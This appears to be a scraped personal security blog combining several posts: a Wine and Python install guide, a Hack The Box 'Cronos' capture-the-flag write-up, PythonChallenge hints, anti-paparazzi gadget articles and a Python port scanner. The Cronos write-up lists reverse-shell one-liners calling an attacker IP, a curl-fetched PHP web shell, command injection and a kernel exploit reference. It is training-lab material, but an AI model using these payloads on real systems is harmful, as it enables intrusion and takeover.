How to install Wine and Python 2.7

Wine is a tool (not an emulator) for running Windows based programs on other non-Windows based operating systems such as Linux. These are the steps to get it installed on Kali Linux with Python 2.7

First add the i386 architecture to your system in case you don’t already have it, the command won’t do anything if you have it already. Skip this first step if that is the case.

Wine-Python-1

Next run apt-get update:

apt-get update

To update your repositories for Linux. This will make sure you get the latest version of Wine.

Wine-Python-2

Install the Wine package using apt-get install wine32. This could take a few minutes depending on your internet connection and you will be asked to confirm the install near the start.

apt-get install wine32

Wine-Python-3

Once installed you should see wine in the /root/.wine folder with a Windows C:/ structure inside it:

Wine-Python-4

The next stage is to download and install Python into your Wine install. Visit the Python download page at:

https://www.python.org/downloads/release/python-2714/

Wine-Python-5

and download the Windows x86 MSI Installer. The file is only 19MB in size so should come down very quickly.

Wine-Python-6

Wine-Python-7

Now navigate to your downloads folder in the terminal and install it using wine msiexec /i python-2.7.14.msi

wine msiexec /i python-2.7.14.msi

Wine-Python-8

The install wizard should appear and unless you have some specific requirements for the install you can just hit next, next, next, finish through the windows.

Wine-Python-9

Wine-Python-10Wine-Python-11

Once the install is complete you can confirm it’s there by navigating to the new Python folder within the Wine directory:

Wine-Python-12

 

 

Hack The Box – Cronos – writeup

Cronis is a Linux box which had a few failures before I found a method which worked to get the root password at the end. It was good practise of the “try harder” motto.

Starting with a nmap scan we can see 3 ports open, SSH, DNS and HTTP

cronos1

I like to check if any default admin:admin type passwords work for ssh login to give us an easy start. but no luck.

cronos2

We can then head over to the webpage and see that it looks like a default Apache install.

cronos3

As the default index.html doesn’t seem to be hiding any clues I started a dirbuster scan to find any hidden files/folders but that also comes up empty.

cronos4

The DNS port we found earlier is likely there for a reason, most HTB boxes don’t have it running unless it’s going to help us compromise a box so lets do some enumeration and see what we can find. An NSlookup shows the subdomain ns1.cronos.htb

cronos5

It’s possible that there are multiple other subdomains being used so lets edit the /etc/hosts file, first trying domain cronos.htb

cronos6

If we then re-visit the server with our browser it takes us to a new page. It’s a good sign we’re on the right track but there are no more clues on this page, we’re likely going to have to keep digging with DNS.

cronos7

we can do a zone transfer to see what other information the DNS server throws up. A few more subdomains are mentioned, and anything with “admin” in the name is always worth looking further into.

cronos8

If we add this new domain to the hosts file as before and visit it we get a new login page we can try to attack.

cronos9

Looking at the source code and trying some default admin:admin credentials doesn’t give us anything, but moving onto testing SQL injection does

cronos10

tricking the login page into thinking we’ve been successful with our credentials takes us to this very basic looking page with some pre-built functions which ping and tracert a given IP

cronos11

As the famous web security saying goes “Never trust user input”. Lets see if the developer of this page took that advice and applied some sort of validation/filter to the user input.

cronos12

Nope! We can run a selection of linux commands by adding a ; after the IP address in the input box. This is the time to start looking at getting a shell over to the server. First we setup our nc listener

cronos13

I then tried a few one liners such as :

  • nc -e /bin/sh 10.0.14.23 4444
  • rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1|nc 10.0.14.23 4444 >/tmp/f
  • php -r ‘$sock=fsockopen(“10.0.14.23”,4444);exec(“/bin/sh -i <&3 >&3 2>&3”);

but they didn’t work so the next step is to see if we could put a PHP script onto the server. The one I used was the pentestmonkey one available from the URL in this screenshot:

cronos14

Once downloaded you need to enter your port and IP and host it using the built in Kali tool SimpleHTTPserver.

cronos15

It can then be uploaded using this command appended to the IP address on the webpage.

curl -O http://10.10.14.23:8000/dodgyfile.php

cronos16

Manually visiting the new file causes it to run and we get our shell.

cronos17cronos18

A quick browse to the user folder finds the flag in the usual place

cronos19

Next step is to try and upgrade our shell so we can perform a few more actions during enumeration. You can spawn a python shell using:

python -c ‘import pty;pty.spawn(“/bin/bash”);’

then navigate over to /dev/shm in preparation for getting the Linenum.sh script onto it.

cronos20

Linenum is a well known script which performs lots of enumeration functions on Linux systems, saving you time and removing the risk of you forgetting to run something useful. It can be found at : https://github.com/rebootuser/LinEnum

I downloaded it and placed it in my SimpleHTTPServer folder, then ran this on the victim machine to transfer it:

curl -O http://10.10.14.23:8000/linuxenum.sh

Note: you need to chmod +x the script before it will run:

cronos21

The script provides a lot of useful information, starting with basic version info:

cronos22

A few options for different shells if we need them for future attacks

cronos23

And it spots a PHP file running with root privileges. Given that the name of the box is Cronos is a clue that we should be looking at something happening with a cron job.

cronos24

If we visit the artisan file it looks like this job runs the schedule method for a program called Laravel artisan. The schedule method however isn’t inside the artisan file. But if we look at google for it we eventually find a reference to where it might be:

cronos25

We can confirm it’s there:

cronos26

The Kernel file allows us to edit it and add our own lines into the schedule method. If this runs as root then in theory we have pwned the system. I tried to execute a cat command to transfer the contents of the root.txt file into a file I had access to:

cronos27

This created the new root.txt file but for some reason didn’t copy the contents of the original file, so lets try changing the permissions to just allow us to browse to it manually.

cronos28

Once again the task ran but didn’t work as expected. There is always more than one way to complete these challenges so after playing with the Kernel.php file for a bit longer I went back to my enumeration and tried looking for other privilege escalation exploits for this version of Linux.

The first one that came up was :https://www.exploit-db.com/exploits/44298

which we can download and compile using:

gcc -o file 44298.c

cronos29

We can transfer it over to the victim machine using SimpleHTTPServer as before and running it works first time to give us root access.

cronos30

The flag is in the root folder.

 

Hints and Tips for PythonChallenge level 0

This is a page of hints for the Pythonchallenge.com level 0 challenge

It does not contain the answer so you can use as many hints as you want but still have to put everything together yourself to complete it

Note: A lot of these challenges have multiple different ways of solving them, the hints here might not match to what you have found already.

Expand for hint 1

Numbering in python starts at 0 and goes up.

Expand for hint 2

The URL bar is normally shown at the top of your browser, can you manually edit it?

Expand for hint 3

The aim is to get to page for the next level.

Expand for hint 4

Python has many mathematical operators.

Expand for hint 5

a single * is for multiplication, a double ** is for something else.

Expand for hint 6

If you think your maths has worked, try editing the URL once again

Installing netfilterqueue in Kali

I had some trouble recently trying to install the python library netfilterqueue onto my Kali box as the usual pip or pip3 commands didn’t seem to work.

both python 2 and python 3 brought back a similiar error:

1

Command “/usr/bin/python3 -u -c “import setuptools, tokenize;__file__=’/tmp/pip-install-8l8q2wql/netfilterqueue/setup.py’;f=getattr(tokenize, ‘open’, open)(__file__);code=f.read().replace(‘\r\n’, ‘\n’);f.close();exec(compile(code, __file__, ‘exec’))” install –record /tmp/pip-record-sk6qu_jn/install-record.txt –single-version-externally-managed –compile” failed with error code 1 in /tmp/pip-install-8l8q2wql/netfilterqueue/

One method to get around it is to try and install it on a different flavour of Linux, but after a bit of trial and error I found that you can get it onto Kali using:

sudo apt-get install python-netfilterqueue

2

This gets it onto your machine for python 2:

3.png

 

Anti-Paparazzi technology part 2

The last post about Anti-Paparazzi clothing sent me down a rabbit hole finding out about other recent inventions designed to stop cameras. Here’s a brief summary of what other options exist if you cant get hold of a nifty reflective scarf:

Flash back handbag

anti-paparazzi

A student named Adam Harvey invented a handbag add-on which detects a camera flash and in return flashes right back at it before the photo is taken. The result is a ruined photograph. I believe the downside is that this device is only quick enough to thwart slower shutter speeds which is good enough in you are in a dark area or out at night but won’t have much of an effect at sporting events where photographers will typically be using quicker shutter speed settings. The device is also not in commercial production but the inventor still deserves some respect for trying to beat a flash at it’s own game.

The inventors website

Write up at Wired.com

Write up at techcrunch.com

Anti photography paint

An article in the express claims that any photographs taken of Angelina Jolie giving birth are fakes because the hospital she was at coated the windows with anti-photography paint. I’m a bit dubious about this claim as the article gives no further details about how it works and google comes up short when trying to find other examples of this technology being used elsewhere.

I think this might be a bit case of the journalist taking some creative liberties and the windows of the hospital room were either coated with the same stuff as one way mirrors (suggesting the inside was kept darker than normal) or the windows simply had the same privacy filters applied that you can get for your office computer to prevent shoulder surfing:

51psD1PqePL._SL1200_.jpg

Privacy screen from 3M

Dubious article from the Express

Lasers!!!

dance-for-laser-1439327.jpg

A decade ago there were reports of technology on Roman Abramovich’s new super boat which utilised lasers to scan in all directions and detect the CCD (Charged couple device) of a digital camera and blind it. The CCD is the part of the camera which detects light before coding the information into pixels. The lasers are able to detect these and send an extra bright beam directly at the CCD, blinding it without affecting anything else.

this technology was first developed as a way to try to stop pirates recording movies in the cinema. There is a lot of speculation (including from the devices inventor) as to how effective it is when taken outside of a small dark cinema room and stuck to the side of a giant yacht in the ocean in broad daylight.

Wired.com – Romans big yacht

techradar – review of the technology

Anti face recognition

There is some interesting work going into stopping facial recognition technology doing its thing. This won’t stop a paparazzi taking a direct photo of you but it might hinder any automated CCTV or video recording software which activates and focuses based on what it detects as a human face.

at CV Dazzle there is a group of make up artists designing styles which stop common facial recognition technology from being able to detect a face. It works by disguising common features which some face recognition technology relies on such as the colouring of eyes, the nose bridge or the edges of the mouth.

anti face recognition make up

The same guy mentioned previously (Adam Harvey) who works on CV Dazzle and the flash-back camera also has a project called “Hyperface” which designs patterns which instead of being detected as a non-face gets detected as hundreds of individual faces, hopefully confusing the facial recognition software and hiding your real face.

Looking at the sample designs it seems strange at how little is needed for software to detect a “face”. a very simple design of pixels which can just about pass as eyes, nose and a mouth seems to be all it takes:

facial recognition baffle

 

CV Dazzle – make up camouflage

Hyperface

 

Anti-Paparazzi clothing

This is probably a problem which doesn’t affect too many readers but if you want to avoid having your photo taken on a night out either by a professional photographer or a snap-happy friend with an iPhone there is a company named “Beta Brand” who makes anti-paparazzi clothing which makes photos look like this:betabrand-photobomber

The clothing itself contains lots of tiny glass spheres which act as a super reflective material which bounce back as much of the light from a flash as possible and tricking a camera into thinking the scene is a lot lighter than it really is. A lot of today’s modern cameras will auto adjust the picture settings and make everything seem darker to adjust for the mass of light it see’s coming in.

Its main downsides are that it doesn’t work if the camera isn’t using a flash or if the photographer is manually adjusting all the settings. The clothes aren’t too overpriced and look cool themselves so it’s likely that wearing them might end up attracting more attention from fans who snap a photo, check that it looks weird and suddenly get more curious as to what is going on.

You can read more about it here:

PetaPixel – Watch flashback anti-paparazzi clothing ruin flash photographs

Digitalrev – How anti paparazzi clothing works

Bored Panda – Anti paparazzi clothing chris holmes

port scanner python script

Python port scanner – raw code with explanation

If you ever find yourself without access to Nmap here is some quick python code for testing the up/down status of 1000 TCP ports on a target host. The code is explained at the bottom:

#!/usr/bin/python

import socket
from termcolor import colored

sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
socket.setdefaulttimeout(1)

host = input(“Enter the target host: “)

def portscanner(port):
if sock.connect_ex((host,port)):
print(colored(“Port %d is closed” % (port), ‘red’))
else:
print(colored(“port %d is open” % (port), ‘green’))

for port in range(1,1000):
portscanner(port)

Explanation:

import socket
from termcolor import colored

These 2 libraries are responsible for creating the connection to the target and for allowing us to add colour to the output

sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
socket.setdefaulttimeout(1)

Sets the connection to use IP4 and sets the timeout to 1 second so you don’t get stuck waiting for connection requests to time out

host = input(“Enter the target host: “)

This is the prompt which you see when you run the code, it adds the input to the ‘host’ variable

def portscanner(port):
if sock.connect_ex((host,port)):
print(colored(“Port %d is closed” % (port), ‘red’))
else:
print(colored(“port %d is open” % (port), ‘green’))

Here is the main function. Instead of testing for a successful connection it looks for a failure, if so it reports that the port is closed. If anything else comes back it assumes the port is open and reports that.

for port in range(1,1000):

Sets the script to scan ports 1- 1000, you can change this to specific numbers or increase the range up to 65535